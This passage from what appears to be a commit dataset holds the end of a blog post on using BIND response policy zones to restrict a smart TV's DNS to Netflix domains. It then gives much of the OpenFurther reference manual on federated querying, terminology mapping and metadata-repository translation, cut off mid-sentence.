\"rpz\"; };\n \nAll queries will then be filtered based on the response policy zones listed. If a match is found in the first (rpz.whitelist) then that will be used, otherwise the second one (rpz) will be checked.\n\nThe Bind server needs to be configured as authorititive master for these zones, similar to a standard zone, although with \"allow-query\" set to none. Again this is in named.conf (in my case \/etc\/bind\/named.conf.default-zones):\n\n zone \"rpz.whitelist\" {\n type master;\n file \"\/etc\/bind\/db.rpz.whitelist\";\n allow-query { none; };\n allow-transfer { none; };\n };\n \n zone \"rpz\" {\n type master;\n file \"\/etc\/bind\/db.rpz\";\n allow-query { none; };\n allow-transfer { none; };\n };\n\nAs can be seen the zone definitions reference the location of the zone files for each. The files are created as follows, using the RPZ syntax. The first zone, rpz.whitelist, is where to define the domains we want to allow. In my case it looks like this:\n\n_\/etc\/bind\/db.rpz.whitelist_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost. (\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum \n \n IN NS localhost.\n \n netflix.com CNAME rpz-passthru.\n *.netflix.com CNAME rpz-passthru.\n \n nflximg.com CNAME rpz-passthru.\n *.nflximg.com CNAME rpz-passthru.\n \n nflximg.net CNAME rpz-passthru.\n *.nflximg.net CNAME rpz-passthru.\n....\n \n\nNote that for each domain I have included the 'apex' record, and also a wildcard to catch all sub-domains. In each case they are listed as CNAME records pointing to rpz-passthru, which is the RPZ syntax to tell Bind to allow queries for them.\n\nThe second RPZ zone file is created as follows. This is configured for all sub-domains of the root zone, with a CNAME pointing to \".\" (which tells RPZ to return NXDOMAIN for such a lookup). As the trailing dot (root zone) is left out of entries in RPZ zones, an asterix on it's own is all that is needed to represent subdomains of the DNS root:\n\n_\/etc\/bind\/db.rpz_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost. (\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum\n \n IN NS localhost.\n\n* CNAME .\n....\n\nWith the config in place I was able to reload Bind and check if it was working. \n\n\n=== Results\n\nSo does it work. If I try to resolve a random domain I get an NXDOMAIN response:\n\n....\ntopranks@dnsvm:~$ dig A www.samsung.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.samsung.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14003\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 2\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.samsung.com.\t\tIN\tA\n....\n\n\nAnd if I try for a sub-domain of netflix.com I get a valid response:\n\n....\ntopranks@dnsvm:~$ dig A www.netflix.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.netflix.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59390\n;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 4, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.netflix.com.\t\tIN\tA\n\n;; ANSWER SECTION:\nwww.netflix.com.\t1800\tIN\tCNAME\twww.geo.netflix.com.\nwww.geo.netflix.com.\t1800\tIN\tCNAME\twww.eu-west-1.prodaa.netflix.com.\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.165.126\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.19.164.15\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.178.51\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.156.83\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.202.184\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.15.72\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.81.52\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.174.58\n....\n\n=== Additions for my Smart TV case\n\nIn addition to the above I changed the ACL on for traffic coming from the TV to only allow TCP on ports 80 and 443, which is enough for Netflix, but importantly blocks the TV from using any external DNS (even in normal circumstances it looks like the TV uses 8.8.8.8 in addition to any DNS server you give it yourself.)\n\nFinally on the TV I changed the DNS server and sure enough the TV thinks something is wrong with DNS:\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/4465905\/26027929\/bd59e8b2-380e-11e7-81b1-b8b2b8fd2ffe.JPG[Samsung Error Message]\n\n\nSo far so good, and yes the Netflix app still works fine. Looking closely at my Bind logs I can see what's happening:\n\n....\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.003 queries: info: client 192.168.240.42#40665 (art-0.nflximg.net): query: art-0.nflximg.net IN A + (192.168.240.32)\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.003 rpz: info: client 192.168.240.42#40665 (art-0.nflximg.net): rpz QNAME PASSTHRU rewrite art-0.nflximg.net via art-0.nflximg.net.rpz.netflix\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.766 queries: info: client 192.168.240.42#34179 (ns11.whois.co.kr): query: ns11.whois.co.kr IN A + (192.168.240.32)\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.766 rpz: info: client 192.168.240.42#34179 (ns11.whois.co.kr): rpz QNAME NXDOMAIN rewrite ns11.whois.co.kr via ns11.whois.co.kr.rpz\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.031 queries: info: client 192.168.240.42#59989 (time.samsungcloudsolution.com): query: time.samsungcloudsolution.com IN A + (192.168.240.32)\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.031 rpz: info: client 192.168.240.42#59989 (time.samsungcloudsolution.com): rpz QNAME NXDOMAIN rewrite time.samsungcloudsolution.com via time.samsungcloudsolution.com.rpz\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.033 queries: info: client 192.168.240.42#36357 (time.samsungcloudsolution.com): query: time.samsungcloudsolution.com IN A + (192.168.240.32)\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.033 rpz: info: client 192.168.240.42#36357 (time.samsungcloudsolution.com): rpz QNAME NXDOMAIN rewrite time.samsungcloudsolution.com via time.samsungcloudsolution.com.rpz\n....\n\n\nSo yeah, probably not ideal as the TV can still get out to the internet, at least on 80 and 443 TCP, but without DNS I've hopefully limited how much it can do.\n \n \n \n \n \n \n \n\n \n \n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"eac39115e6f84a9c417f52977567e0ffad175f95","subject":"Update reference-manual.asciidoc","message":"Update reference-manual.asciidoc\n\nAdded description to skipAttr property configuration when FURTHER.observationType does not associate to any attribute at the External Data Source.","repos":"openfurther\/further-open-doc,openfurther\/further-open-doc,openfurther\/further-open-doc","old_file":"reference-manual.asciidoc","new_file":"reference-manual.asciidoc","new_contents":"OpenFurther Reference Documentation\n===================================\n\nAbout\n-----\nThe following documentation applies to *OpenFurther version 1.4.0-SNAPSHOT*\n\nConventions\n~~~~~~~~~~~\n\nNOTE: A note\n\nIMPORTANT: An important point\n\nTIP: A tip\n\nWARNING: A warning\n\nCAUTION: A point of caution\n\nIntroduction\n------------\nOpenFurther is an informatics platform that supports federation and integration of data from heterogeneous and disparate data sources.\n\nIt has been deployed at the University of Utah (UU) as the Federated Utah Research and Translational Health e-Repository (FURTHeR) since August 2011 and is available for use by all U of U employees and students. OpenFurther links heterogeneous data types, including clinical, public health, biospecimen and patient-generated data; empowering researchers with the ability to assess feasibility of particular clinical research studies, export biomedical datasets for analysis, and create aggregate databases for comparative effectiveness research. With the ability to link unique individuals from these sources, OpenFurther is able to identify cohorts for clinical research.\n\nIt provides semantic and syntactic interoperability as it federates health information on-the-fly and in real-time and requires neither data extraction nor homogenization by data source partners, facilitating integration by retaining data in their native format and in their originating systems.\n\nOpenFurther is built upon Maven, Spring, Hibernate, ServiceMix, and other open source frameworks that promote OpenFurther's code reusability and interoperability.\n\n\nArchitecture\n------------\nLoosely, OpenFurther runs as a multi-tier application. The presentation layer or front end\/user-interface is served (currently) through the i2b2 web client. The logic layer is served through the ServiceMix ESB, and the database layer is served using Oracle 11g, although it can be configured for other databases as well.\n\nUser Interface\n~~~~~~~~~~~~~~\nOpenFurther utilizes the i2b2 web client as a front-end for querying data. The user interface has been modified to support federated querying.\n\n.Customized i2b2 User Interface\nimage::images\/figures\/i2b2_ui_query_results.png[]\n\nHooking OpenFurther into i2b2\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nOpenFurther utilizes a Java Servlet Filter to divert query requests to the OpenFurther backend system. The Servlet filter looks for XML messages from i2b2 that indicate a query is being run. Those XML messages are then diverted to OpenFurther where OpenFurther converts them into a OpenFurther query and runs them. All other XML messages are ignored and i2b2 is allowed to run as normal. \n\nNOTE: *No data is stored within i2b2, all data resides within its original location*\n\nThe Federated Query Engine (FQE)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nIn OpenFurther, the term \"FQE\" (Federated Query Engine) is broadly referred to as the set of software modules involved in the execution of a federated query.\n\n.Federated Query Engine\nimage::images\/figures\/fqe.png[]\n\n* A federated query written in FQL (an XML based query language) or an i2b2 query is submitted at *1*.\n* Utilizing the publish-subscribe pattern, one or more data source adapters are subscribed to the Query Topic at *2*. \n* If the query is an i2b2 query, the FQE converts the i2b2 query to a federated query. \n* The FQE then posts the query to the Query Topic (*2*) and each listening data source adapter receives a copy of the query.\n* Each data source adapter runs through a number of steps to initialize, process, and translate a query for a given data source (Explained below). \n* Throughout the processing, status messages are sent to a Status Queue at *3*. \n* Once results are translated to a common model, they are persisted to the In-Memory database and result count is sent to *4*.\n\nData Source Adapters\n~~~~~~~~~~~~~~~~~~~~\nData source adapters are facades around an existing data source. Data source adapters can be entirely custom for any given implementation or they can use a pre-written adapter if their data source is already in a well-known format such as OMOP, i2b2, OpenMRS, etc\n\nData source adpater configuration should follow the configuration steps outlined in reference-manual-datasources link:reference-manual-datasources.pdf[pdf], link:reference-manual-datasources.asciidoc[asciidoc] \n\n.Data Source Adapters\nimage::images\/figures\/data_source_adapters.png[]\n\n* Data source adapters follow the chain-of-responsibility pattern. The process of adapting a query is broken down into several small steps and each output is passed on to the next step. Data source adapters typically have 4 commons steps. \n\n1. They are given an initialization step which allows them to determine whether or not the given data source can answer the given query. It also provides for any other initialization required throughout the process. \n2. Query translation translates the logical FQL that is not specific to any data source into data source specific language. This will vary with data sources. Some data sources will utilize SQL, other\u2019s might be a web service. It utilizes the Metadata Repository (MDR) for translating attributes and values (e.g. logical query uses Gender but actual data source uses Sex as the attribute). It also utilizes DTS (Terminology Server) to translate from a given code (e.g. ICD9 250) to the data source\u2019s code (e.g. 12345) \n3. The query is executed against the data source and results are returned in their native format (SQL ResultSet, XML, etc). \n4. Result translations translates the results into a common model with standardized vocabulary\/terminology utilizing the Metadata Repository (MDR) and DTS (Terminology Server).\n\nTerminology Server\n~~~~~~~~~~~~~~~~~~\nOpenFurther utilizes Apelon's Distributed Terminology System version 3.5.2.203 (aka. DTS) for terminology related functionality. The OpenFurther instance of DTS contains concepts from the standard terminologies SNOMED-CT, ICD-9, RxNorm, and UCUM. There are also non-standard terminologies (aka Local) for each of the data sources as well as associated mappings. The use of standard terminologies and mappings make it possible for the software to resolve differences between concepts in various data sources and achieve a degree of semantic interoperability. Use of Apelon DTS is an assumption of agreement to the Apache Version 2 standard open source license agreement http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html. For more information about Apelon DTS please see their website http:\/\/www.apelon.com.\n\nFeatures of Apelon DTS\n^^^^^^^^^^^^^^^^^^^^^^\nThe Apelon DTS (Distributed Terminology System) is an integrated set of open source components that provides comprehensive terminology services in distributed application environments.\n\nDTS Supports national and international data standards, which are a necessary foundation for comparable and interoperable health information, as well as local vocabularies.\n\nDTS consists of\n\n* DTS Core - the core system, database, api, etc\n* DTS Editor - a GUI interface for viewing, adding, and editing concepts\n* DTS Browser - a web interface for viewing concepts\n* Modular Classifier - allows for extending standard ontologies\n\nTerminology\n-----------\n\nGetting Started\n~~~~~~~~~~~~~~~\nIn order to utilize the OpenFurther software, it is necessary to have terminology mappings from your desired data sources to standard terminologies. These standard codes are then translated via the software, terminology server, and associated mappings to be able to resolve to a local data source's codes\/terms.\n\nIMPORTANT: It is important to note that the content distributed with OpenFurther is for demonstration purposes only. The standard terminologies have been provided with permission via Apelon's distribution of free subscription content available on their open source website link:http:\/\/apelon-dts.sourceforge.net\/[]. This standard content is several years out of date and would not be the most suitable for a real world instance. \n\nTIP: It is recommended for organizations that desire to use the OpenFurther software to consider resourcing a dedicated terminologist or someone that has experience with controlled vocabularies and ontologies to work on managing\/mapping local vocabularies\/codes to their specific implementation of OpenFurther.\n\nApelon provides a content delivery subscription service at a reasonable cost. Standard terminologies can also be downloaded from the U.S. National Library of Medicine Unified Medical Language System (link: http:\/\/www.nlm.nih.gov\/research\/umls\/[UMLS]) after meeting and accepting their requirements and license agreements. \n\nNOTE: The local vocabularies have been mapped to the best possible matches to the available standard terminologies. However, in some cases such as OpenMRS, local concepts had to be created to fit the OpenFurther demonstration scenario. Any creation of local concepts was done in best accordance of the specifications provided by the source. \n\nOpenFurther's i2b2 front end user interface contains an ontology based off of the recommendations of the Healthcare Information Technology Standards Panel (HITSP). For instance, HITSP recommends the use of ICD-9 codes for diagnosis and LOINC for laboratory data. Please note that because of licensing agreements, not all of the HITSP recommendations could be followed for OpenFurther. For example, HITSP recommends the use of CPT for procedures. In OpenFurther, procedures will be based off the SNOMED CT hierarchy for procedures.\n\nWhy are mappings needed?\n^^^^^^^^^^^^^^^^^^^^^^^\nMappings are needed because of the variations in terminology used between disparate data sources. Mappings equate concepts that are intended to mean the same thing. \n\nTIP: Mapping can be a very human labor intensive task. Mappings must be verified and tested to ensure quality of results. Involving subject matter experts and collaborating effectively across datasources will be paramount to achieving a successful implementation of terminology.\n\n.Mapping Terminology\nimage::images\/figures\/mapping_terminology.png[]\n\nInitial Steps\n^^^^^^^^^^^^^\nApelon DTS provides excellent documentation and examples of how to use their terminology server software. All Apelon documentation can be found at: http:\/\/apelon-dts.sourceforge.net\/documents.html\n\nIMPORTANT: It is highly recommended that you familiarize yourself with the basic use of the Apelon DTS software. The instance included in OpenFurther can serve as an example of how the OpenFurther team has used Apelon DTS but the best instruction on how to use Apelon DTS is provided directly from Apelon. \n\nLocal Namespaces\n++++++++++++++++\nRefer to page http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#62[62] of the Apelon DTS Editor documentation.\n\nAuthorities\n+++++++++++\nRefer to page http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#72[72] of the Apelon DTS Editor documentation.\n\nAssociation Types\n+++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#75[75-77] of the Apelon DTS Editor documentation.\n\nAssociation Qualifier Types\n+++++++++++++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#80[80-84] of the Apelon DTS Editor documentation.\n\nProperty Types\n++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#94[94-96] of the Apelon DTS Editor documentation.\n\nProperty Qualifier Types\n++++++++++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#99[99-101] of the Apelon DTS Editor documentation.\n\nAdding new concepts\/terms, assign properties, assosciations\/mappings\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#119[119-141] of the Apelon DTS Editor documentation.\n\nBulk loading and working with spreadsheets\n++++++++++++++++++++++++++++++++++++++++++\n\nRefer to the import wizard plugin http:\/\/sourceforge.net\/apps\/trac\/apelon-dts\/raw-attachment\/wiki\/MiscWikiFiles\/importwizarduserguide-3.0.pdf[user guide]\n\n\nThe Metadata Repository (MDR)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nThe MDR is responsible for storing information (artifacts) about varying data sources. This includes things like data models, attributes, attribute types, etc. It is accessed using web services.\n\n* Home grown but follows standards\n** XMI, Dublin Core\n** HL7 datatypes, CDA, DDI\n* Stores artifacts\n** Logical models (UML), local models (UML), model mappings\n** Administrative information\n** Descriptive information\n* Models supported\n** OMOP, i2b2, local models\n\nMetadata Repository (MDR)\n-------------------------\n\nGetting Started\n~~~~~~~~~~~~~~~\nTwo important functions supported by the metadata repository are Query Translation and Result Translation. Data stored within the MDR is used to drive each of these processes.\n\n.Translating Metadata\nimage::images\/figures\/translating_metadata.png[]\n\nQuery Translation\n^^^^^^^^^^^^^^^^^\nThe objective of a query translation is to convert the OpenFurther Query Language (FQL) query (OpenFurther's classes, attributes, and attribute values) into the target physical data source's data classes, attributes, and attribute values while maintaining the integrity of the query logic. If the attributes being queried does not exist in the external target data source, no data will be returned from the particular source. Therefore, the end user must carefully select the attributes to ensure that they exist in the target of interest.\n\n.Query Translation\nimage::images\/figures\/query_translation.png[]\n\nThe user interface, currently i2b2, is responsible for building a query. When a query is submitted to the FQE, the FQE converts i2b2's query into the FQL, an XML representation of the query (see the FQL XML Schema) that consists of logical expressions using OpenFurther's data model classes and attributes. Class and class attribute names used in FQL are based on OpenFurther classes and attributes and can be found in the OpenFurther's Java code located here: https:\/\/github.com\/openfurther\/further-open-core\/tree\/master\/ds\/ds-further\/src\/main\/java\/edu\/utah\/further\/ds\/further\/model\/impl\/domain\n\nCoded class attribute value domains within the OpenFurther model are all based on standard terminology where demographics are SNOMED CT codes, diagnosis are ICD-9 codes, and labs are LOINC codes. All attributes that have coded values sets also have an associated attribute that ends with the term 'NamespaceId' (namespaces are also called coding systems). This NamespaceId attribute is used to signify what coding system a particular attribute will use. For instance, raceCode=413773004 and raceCodeNamespaceId=30 would signify the SNOMED CT code for the Caucasian race.\n\nBy default, Apelon DTS reserves certain identifiers for use with standard terminologys.\n\n.Apelon DTS Namespace Identifiers\n[width=\"40%\",frame=\"topbot\",options=\"header\"]\n|======================\n|Namespace |Identifier\n|SNOMED CT |30\n|ICD-9 |10\n|LOINC |5102\n|RxNorm |1552\n|======================\n\nExample input and output\n++++++++++++++++++++++++\n\n.Example query translation input\n[source,xml,numbered]\n<query xmlns=\"http:\/\/further.utah.edu\/core\/query\" \n\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" rootObject=\"Person\">\n\t<rootCriterion>\n\t\t<searchType>CONJUNCTION<\/searchType>\n\t\t<criteria>\n\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t<parameters>\n\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">\n\t\t\t\t\traceNamespaceId\n\t\t\t\t<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:long\">30<\/parameter>\n\t\t\t<\/parameters>\n\t\t<\/criteria>\n\t\t<criteria>\n\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t<parameters>\n\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">race<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">\n\t\t\t\t\t413773004\n\t\t\t\t<\/parameter>\n\t\t\t<\/parameters>\n\t\t<\/criteria>\n\t<\/rootCriterion>\n\t<sortCriteria \/>\n\t<aliases \/>\n<\/query>\n\nGiven the above input, query translation would generate the following output\n\n.Example query translation output\n[source,xml,numbered]\n<query xmlns=\"http:\/\/further.utah.edu\/core\/query\" \n\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" rootObject=\"Person\">\n\t<rootCriterion>\n\t\t<searchType>CONJUNCTION<\/searchType>\n\t\t<criteria>\n\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t<parameters>\n\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">\n\t\t\t\t\traceConceptId\n\t\t\t\t<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:decimal\">\n\t\t\t\t\t4185154\n\t\t\t\t<\/parameter>\n\t\t\t<\/parameters>\n\t\t<\/criteria>\n\t<\/rootCriterion>\n\t<sortCriteria \/>\n\t<aliases \/>\n<\/query>\n\nResult Translation\n^^^^^^^^^^^^^^^^^^\nEach data source queried by OpenFurther will respond with a result set in the platform\/database specific format and need to be converted into OpenFurther's data model for final analysis and reconciliation of the returned data from each data source, ie. all the pears, oranges, and pineapples need to be converted the same kind of apples. This is the job of the query result set translations, to translate all the query results back to a common\/canonical\/platform-independent model, or the OpenFurther model in this case.\nOpenFurther uses XQuery code to translate platform-specific result sets to the OpenFurther model implying all data is\/must be converted to XML. Converting to XML is not an extra cost since OpenFurther is a web service-centric infrastructure where messages between services are communicated via XML. Query results are no exception. Data within the MDR drives the XQuery code to translate the data source specific data model and values to the OpenFurther data model and values based on standard terminology. After the XML has been translated the data are unmarshaled back to Java objects, the OpenFurther model Java objects, where\/when they are persisted to the query results database (typically the in-memory database) using Hibernate.\n\n.Result Translation\nimage::images\/figures\/result_translation.png[]\n\nCreating metadata in the MDR\n++++++++++++++++++++++++++++\nTranslations depend on the MDR for attribute-to-attribute translations. The MDR is supported by an abstract data model where metadata \"things\" are Assets (see the FMDR.ASSET table), including data classes and class attributes. There are other Asset supporting tables ASSET_VERSION and ASSET_RESOURCE that you can ignore for now, as they are not currently used for this purpose. There are, however, two other tables that are critical, ASSET_ASSOC (association) and ASSET_ASSOC_PROP (association properties). ASSET, ASSET_ASSOC, and ASSET_ASSOC_PROP work together to describe attribute-to-attribute translation mappings. Assets also represent association types, such as hasAttribute, or translatesTo. The MDR contains metadata used for both Query Translations and Result Translations.\n[NOTE]\nThe MDR is configured using Java class and Java field names, rather than database table and attribute names.\n\nThere are 3 phases to configure a new data source for the MDR.\n\n.Phase 1\nThe first thing that should happen is to create a Mapping of the FURTHER model to your local data model. This step is generally performed by a Terminologist and\/or Data Architect and has no specific configuration with the MDR, but serves as the business requirements or data dictionary document for configuring the MDR in Phases 2 and 3.\n\nYou can use this Excel file as an example:\n(Click on the Raw Link to save the file)\n\nhttps:\/\/github.com\/openfurther\/further-open-doc\/blob\/master\/files\/OpenMRS_Mappings_Demo.xls\n\n.Phase 2\nConfigure your local data source for the MDR.\n\nYou should have review and have a fair understanding of the following MDR data model before proceeding.\n\n.MDR ERD Diagram\nimage::images\/figures\/fmdr.png[MDR ERD Diagram]\n\n\/\/ Here is just One way of having a blank line with asciiDoc\n{empty} +\n\nUse this Excel file as an example:\n(Click on the Raw Link to save the file)\n\nhttps:\/\/github.com\/openfurther\/further-open-doc\/blob\/master\/files\/OpenMRS_Asset_Demo.xls\n\nThe Excel File's Instructions Tab contains these following high level steps:\n\n1. Create a namespace - a namespace is itself an Asset of Asset type namespace (see other namespace Assets for examples. \nRetrieve the newly created Asset ID for MyNamespace and use this Asset ID to create your classes and attributes in Steps 2 & 3.\n2. Create a class in MyNamespace - this is done by creating another Asset that is of type Physical Class.\nRetrieve the newly created Asset ID for MyClass and use this Asset ID to create your Class-To-Attributes Associations in Step 4.\n3. Create the class attributes in MyNamespace - this is done by creating Assets that are of type Class Attribute.\n4. Associate all of the class attributes with your class by creating an Asset Association (ASSET_ASSOC) to create the associations myPhysicalClass hasAttribute myClassAttribute for each of the attributes created in Step 3.\n\n.Phase 3\nConfigure FURTHER to External Data Source Associations and Properties\n\nUse this Excel file as an example:\n(Click on the Raw Link to save the file)\n\nhttps:\/\/github.com\/openfurther\/further-open-doc\/blob\/master\/files\/OpenMRS_Assoc_Demo.xls\n\nThe Excel File's Instructions Tab contains these following high level steps:\n\n1. Configure FURTHER Attribute (Java Field) to External Attribute (Java Field) Associations.\nFor example, OpenFurther.Person.dateOfBirth to MyNamespace.myPatient.birthDate. The direction of this relationship is crucial, LS=left side, RS=right side, so that OpenFurther.Person.dateOfBirth (left side) maps to myPerson.birthDate (right side) using the association \"translatesTo\". The view ASSET_ASSOC_V illustrates existing mappings that are enabled. Note that associations can be \"disabled\" with a \"N\" in the asset_assoc.enabled field.\n2. Configure FURTHER Table (Java Class) to External Table (Java Class) Associations.\nFor example, OpenFurther.Person to MyNamespace.myPatient. The direction of this relationship is crucial, LS=left side, RS=right side, so that OpenFurther.Person (left side) maps to MyNamespace.myPatient (right side) using the association \"translatesTo\". The view ASSET_ASSOC_V illustrates existing mappings that are enabled. Note that associations can be \"disabled\" with a \"N\" in the asset_assoc.enabled field.\n3. Create translatesTo association translation properties for the above 2 steps.\nTranslation associations (and other associations) can have properties (in ASSET_ASSOC_PROP table) that describe the translation mapping requirements. For example, some properties may direct a data type conversion such as int to string, while others may declare a function that needs to be used for a functional conversion, or even an instruction to not change an attribute name. Properties are created via the ASSET_ASSOC_PROP table and are associated to ASSET_ASSOC records.\n\n[NOTE]\nThere are two parts to the list of Potential Association Properties. \nPart One is primarily used for Query Translations, and part Two is used for Result Translations. \nQuery Translations are much more complex and therefore supports more association properties than Result Translations.\n\n[NOTE]\nGeneral Error Handling Note:\nIf you query an Attribute (Data Element) that exists in the Central Data Model, but is missing and does not have an associated Attribute in the External Data Model, the XQuery Query Translation program is expected to Error out with the missing data element specified.\nThe reasoning is because when a data element is missing from a criteria, the definition of the entire query is changed, and therefore invalidates the entire Query.\nThis Error will halt the entire Query Processing Session.\nHowever, for Result Translation, Missing data elements are not critical since the rest of the data values are still valid and may be valuable to the researchers.\nTherefore, a missing data element association in Result Translations will not halt the entire Result Translation process.\n\n.Part One (Query Translations)\nThere are Normal Scenarios and Special Scenarios for Query Translations.\n\n.Normal Scenario 1) Configure for DTS Coded Value Translation with:\nProp_Name = ATTR_VALUE_TRANS_FUNC\n\nProp_Val = translateCode\n\n.Normal Scenario 2) Configure for Data Type Translation with:\nProp_Name = ATTR_VALUE_TRANS_TO_DATA_TYPE\n\nProp_Val = xs:decimal (Or other appropriate valid XML Data Types)\n\n.Java Data Type to XML Data Type Mapping. There may be others not listed here.\n[options=\"header\"]\n|=======================\n|Java Data Type | XML Data Type\n|char or java.lang.Character | xs:string\n|byte or java.lang.Byte | xs:byte\n|short or java.lang.Short | xs:short\n|int or java.lang.Integer | xs:int\n|long or java.lang.Long | xs:long\n|float or java.lang.Float | xs:float\n|double or java.lang.Double | xs:double\n|boolean or java.lang.Boolean | xs:boolean\n|java.lang.String | xs:string\n|java.math.BigInteger | xs:integer\n|java.math.BigDecimal | xs:decimal\n|java.util.Calendar | xs:dateTime\n|java.util.Date | xs:dateTime\n|javax.xml.namespace.QName | xs:QName\n|java.net.URI | xs:string or xs:anyURI\n|javax.xml.datatype.XMLGregorianCalendar | xs:anySimpleType\n|javax.xml.datatype.Duration | xs:duration\n|java.lang.Object | xs:anyType\n|java.awt.Image | xs:base64Binary\n|javax.activation.DataHandler | xs:base64Binary\n|javax.xml.transform.Source | xs:base64Binary\n|java.util.UUID | xs:string\n|=======================\n\n.Normal Scenario 3) Configure property for the Composite ID Association.\nThis is currently needed to support queries within previous Query Result Sets.\n\nProp_Name = ATTR_VALUE_TRANS_TO_JAVA_DATA_TYPE\n\nProp_Val = Java Data Type of the external person ID that is associated with the OpenFurther.Person.compositeId\n\nFor example,\n\nProp_Name = ATTR_VALUE_TRANS_TO_JAVA_DATA_TYPE\n\nProp_Val = java.lang.Integer\n\n.Normal Scenario 4) Configure 2 properties, Alias_Key and Alias_Value for each Table Association.\nIf there are more than one table associations, configure multiple pairs of these properties.\n\nThe Prop_Val for ALIAS_KEY can be anything. \n\nFor example,\n\nProp_Name = ALIAS_KEY\n\nProp_Val = dx\n\nIf your data source requires a Static Alias Key Prop_Val, append 'STATIC^' to your Alias Key Prop_Val.\n\nUse this example:\n\nProp_Name = ALIAS_KEY\n\nProp_Val = STATIC^Diagnosis\n\nNow, configure the ALIAS_VALUE Property\n\nThe Prop_Val for ALIAS_VALUE is the Java member name within the rootObject (Person Class).\n\nFor example,\n\nProp_Name = ALIAS_VALUE\n\nProp_Val = conditionEras\n\n.Special Scenario 1) Occasionally, there may be some value translations that are non-coded values. For example, if you associate age to birthYear, you will need to special custom XQuery function to perform the translation. In this case, create a function in the XQuery program called ageToBirthYear and configure the MDR with this property.\n\nProp_Name = ATTR_VALUE_TRANS_FUNC\n\nProp_Val = ageToBirthYear\n\nSo instead of the normal translateCode in the Prop_Val, we have \"ageToBirthYear\".\n\n.Special Scenario 2) Each Asset Association by default specifies that Left Asset translates to Right Asset. However, if you want to skip this translation without throwing an Error, provide an assocation property with the following. This is mostly used with devNull associations. For example, the FURTHER.PERSON.ID.DATASETID does not translate to anything at the External Data Sources, however, we do not want to consider this as an Error, therefore, we simply skip it from translation processing. This property is used for only Special attributes such as datasetID, and Qualifier \"Type\" attributes. This skipping property should NOT be applied to normal attributes, where an Error is expected. If you have an ObservationType that does not associate to anything in the External Source, be sure to configure an Association to devNull, and then create this property to skip the ObservationType Attribute.\n\nProp_Name = ATTR_TRANS_FUNC\n\nProp_Val = skipAttr\n\n.Special Scenario 3) The FURTHER table attribute Obervation.observation is overloaded as Diagnosis, Procedure, and Lab Order. If the FURTHER.Obervation table translates to more then one table at the External Data Source, we must provide this property to assist with Query Translation. This property specifies the type of observation (Diagnosis 